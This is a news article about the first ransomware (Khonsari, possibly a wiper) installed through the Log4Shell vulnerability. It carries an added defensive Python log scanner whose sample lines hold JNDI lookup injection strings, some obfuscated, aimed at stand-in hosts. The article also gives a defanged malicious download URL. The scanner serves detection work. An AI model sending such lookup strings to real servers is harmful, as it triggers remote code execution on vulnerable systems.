The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.
Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.
The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.
While this vulnerability was fixed in Log4j 2.15.0 and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to install various malware, including coin miners, botnets, and even Cobalt Strike beacons.
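As an added defensive example (not code from the article, from BitDefender, or from the Log4j project), the following Python scanner shows how the two points above translate into practice: it looks for JNDI lookup strings in request logs after collapsing the common nested-lookup obfuscations, matches the download host named in this article, and classifies a Log4j 2.x version against the 2.15.0 fix and the 2.16.0 hardening. The log lines, the `198.51.100.x`/`203.0.113.x` hosts and all function names are constructed for this example; the only real indicator is the defanged `hxxp://3.145.115[.]94/Main.class` URL from the article.

```python
"""Defensive log triage for Log4Shell-style JNDI lookup strings (added example)."""
import base64
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Defanged indicator taken from the article (the Main.class download URL).
ARTICLE_IOC = "hxxp://3.145.115[.]94/Main.class"

# Constructed sample log lines for demonstration only (not real traffic).
SAMPLE_LOGS: List[str] = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://203.0.113.5/x}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}di:dns://example.invalid/y}"',
    'proxy 10.0.0.7 CONNECT 3.145.115.94:80 GET /Main.class',
]

# Innermost lookup: a ${...} whose body contains no further $, { or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup, capturing the protocol (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp, [.]) back into a matchable string."""
    return (ioc.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


IOC_HOST: str = urlsplit(refang(ARTICLE_IOC)).hostname or ""


def _resolve_inner(m) -> str:
    """Evaluate one innermost lookup the way Log4j's lookups would, for the
    obfuscation helpers attackers commonly wrap around 'jndi'."""
    body = m.group(1)
    key, sep, rest = body.partition(":")
    if sep and key.lower() == "lower":
        return rest.lower()
    if sep and key.lower() == "upper":
        return rest.upper()
    if sep and key.lower() == "base64":
        try:
            return base64.b64decode(rest, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    if ":-" in body:                      # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    return m.group(0)                     # unknown lookup: leave it intact


def normalize(line: str, max_rounds: int = 10) -> str:
    """Collapse nested lower/upper/base64/default lookups until a fixpoint."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, line)
        if new == line:
            break
        line = new
    return line


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return finding details for one log line, or None when it is clean."""
    finding: Dict[str, str] = {}
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m:
        finding["jndi_protocol"] = m.group(1).lower()
        finding["normalized"] = norm
    if IOC_HOST and IOC_HOST in line:
        finding["ioc_host"] = IOC_HOST
    return finding or None


def scan_logs(lines: List[str]) -> List[Tuple[int, Dict[str, str]]]:
    """Scan a batch of lines; returns (index, finding) for each hit."""
    hits = []
    for i, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((i, finding))
    return hits


def log4j_status(version: str) -> str:
    """Classify a Log4j 2.x version string against the fixes the article
    names: lookups fixed in 2.15.0, tightened further in 2.16.0."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    while len(parts) < 3:
        parts += (0,)
    if parts[0] != 2:
        return "not-log4j2"               # 1.x is outside this check
    if parts < (2, 15, 0):
        return "vulnerable"
    if parts < (2, 16, 0):
        return "fixed-2.15.0"
    return "fixed-2.16.0"


if __name__ == "__main__":
    for idx, hit in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {hit}")
    for v in ("2.14.1", "2.15.0", "2.16.0"):
        print(v, log4j_status(v))
```

The normalisation step matters more than the regex: a plain search for `${jndi:` misses the third and fourth sample lines, while the fixpoint loop reduces them to the same canonical form before matching. The version check is deliberately a string comparison on the declared version; on a real host you would still need to confirm which `log4j-core` jar is actually on the classpath.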
Yesterday, BitDefender reported that they found the first ransomware family being installed directly via Log4Shell exploits.
The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.
Once loaded, it would download a .NET binary from the same server to install new ransomware [VirusTotal] named ‘Khonsari.’
This same name is also used as the extension for encrypted files and in the ransom note, as shown below.
In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.
Ransomware expert Michael Gillespie told BleepingComputer that Khonsari uses valid encryption and is secure, meaning that it is not possible to recover files for free.
However, the ransom note has one oddity – it does not appear to include a way to contact the threat actor to pay a ransom.
Emsisoft analyst Brett Callow pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.
Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.
Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.
While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.
Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved